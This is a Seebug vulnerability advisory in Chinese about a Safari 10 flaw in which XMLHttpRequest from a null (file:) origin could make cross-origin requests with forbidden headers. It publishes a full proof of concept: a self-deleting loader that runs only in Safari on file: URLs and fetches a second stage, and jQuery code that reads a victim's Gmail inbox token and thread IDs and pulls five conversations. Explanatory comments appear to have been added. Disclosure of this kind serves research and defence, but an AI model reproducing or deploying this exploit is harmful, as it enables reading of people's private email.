Safari 10 跨域漏洞

2017-10-09T00:00:00
ID SSV:96615
Type seebug
Reporter lxraa
Modified 2017-10-09T00:00:00

Description

Safari 10 的 XMLHttpRequest 在 null 域下可以随意发起跨域请求并设置 HTTP header

我把漏洞提交到苹果的 bug report，并给 Apple 发邮件后，他们自己悄悄把漏洞修了，连封邮件都没给我回，所以我决定公开 PoC

这是我在漏洞未修复前截的图:

这个漏洞可以造成同源策略绕过，任意跨域；这是我写的获取 Gmail 数据的代码：

```html
<script id='jquery' src='http://apps.bdimg.com/libs/jquery/2.1.1/jquery.min.js'></script>
<script id='test'>

// Base URL of the local server that hosts the second-stage script (page-specific value).
var server_address = 'http://127.0.0.1:8000/static/csrf_Wcn6h/'

// Removes this inline <script id='test'> element from the document once it has run.
function deleteSelf(){ let test = document.getElementById('test'); test.parentNode.removeChild(test);

} function getPoc(src,id){ // src: URL of the script to load; id: id given to the appended <script> so it can be removed again

// Loads `src` by appending a <script> element to <head>, then removes that element straight away.
// Note: `script` is assigned without a declaration, so it leaks as an implicit global.
let head = document.getElementsByTagName('HEAD').item(0);
script = document.createElement("script");
script.type = "text/javascript";
script.src = src;
script.id = id;
head.appendChild(script);
let test = document.getElementById(id);
test.parentNode.removeChild(test);

}

// Only runs the second stage when the page was opened from a file: URL (the "null origin"
// condition the report describes) in a Safari user agent that is not Chrome; in every other
// case the script just removes itself.
if('file:' == document.location.protocol && navigator.userAgent.toLowerCase().indexOf("safari")>-1 && navigator.userAgent.toLowerCase().indexOf("chrome")<0){ getPoc(server_address+"get_gmail.js","get_gmail");

deleteSelf();

} else{ deleteSelf();

}

</script>

```

```javascript

// Despite the name, this does not contact a server: it stores the XHR response body in
// localStorage under an incrementing numeric key. `num` is declared below with `let`, so
// this function must only be called after that declaration has run.
function send_to_server(data_sender){ localStorage.setItem((++num).toString(),data_sender.responseText);

}

// As pasted, this listing is collapsed onto a few long lines: the `//data: data,` line comment
// on the first line swallows the `headers` object and the `success` handler that follow it,
// and `&lt;` in the loop header is an HTML-escaped `<`. The listing is therefore not runnable
// verbatim; the original source presumably had one statement per line.
// The `headers` object sets `Host` and `Accept-Encoding`, which page script is normally not
// allowed to set -- being able to do so is the behaviour the report describes.
let num = 0; let mail_list; let ik; let t = $.ajax({ type: 'get', url: "https://mail.google.com/", //data: data, headers:{'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8', 'Accept-Encoding':'gzip, deflate, br', 'Accept-Language':'zh-CN,zh;q=0.8,en;q=0.6', 'Host':'mail.google.com' }, success: function(event,xhr,settings){ mail_list = t.responseText.match(/var\sVIEW_DATA=(.*);\svar\sGM_TIMING_END_CHUNK2/)[1];

// `match` returns null when the regex does not hit, so the `[1]` above and the `[11]` below
// throw a TypeError on any response that does not have the expected shape.
ik = t.responseText.match(/(.*)var\sGLOBALS=\[(.*?),(.*?),\"(.*?)\",\"(.*?)\",\"(.*?)\",\"(.*?)\",\"(.*?)\",\"(.*?)\",(.*?),\"(.*?)\"(.*)/)[11];

if(mail_list != null){

    // eval() on content taken from a remote response: whatever that response contains runs
    // with this page's privileges. Flagged here, not changed.
    mail_list = eval(mail_list)[3][2];
    console.log(mail_list);

    // `&lt;` is an extraction artefact for `<`.
    for(let i = 0;i &lt; 5;i++){

      let th = mail_list[i][0];
      // Several of these headers (Host, Connection, Content-Length, User-Agent, Origin,
      // Accept-Encoding) are ones a conforming browser refuses to let page script set; a patched
      // browser drops or rejects them, which is what closes the behaviour described above.
      let data_sender = $.ajax({
          type:'post',
          data:'',
          url:'https://mail.google.com/mail/?ik='+ik+'&view=cv&th='+th+'&prf=1&search=inbox',
          headers:{
              'Host': 'mail.google.com',
              'Connection': 'close',
              'Content-Length': '0',
              'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
              'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
              'Accept': '*\/*',
              'Accept-Encoding': 'gzip, deflate, br',
              'Accept-Language': 'zh-CN,zh;q=0.8,en;q=0.6',
              'X-Same-Domain': '1',
              'Origin': 'https://mail.google.com',
              'X-Chrome-UMA-Enabled': '1',
          },
          success:function(event,xhr,settings){
              // Stores the response body locally; see send_to_server above.
              send_to_server(data_sender);

          }
      });
    }
      // Leftover block-comment toggle from debugging; has no effect here.
      //*/
}
else{
    console.log('get mail_list error');
}

} }); ```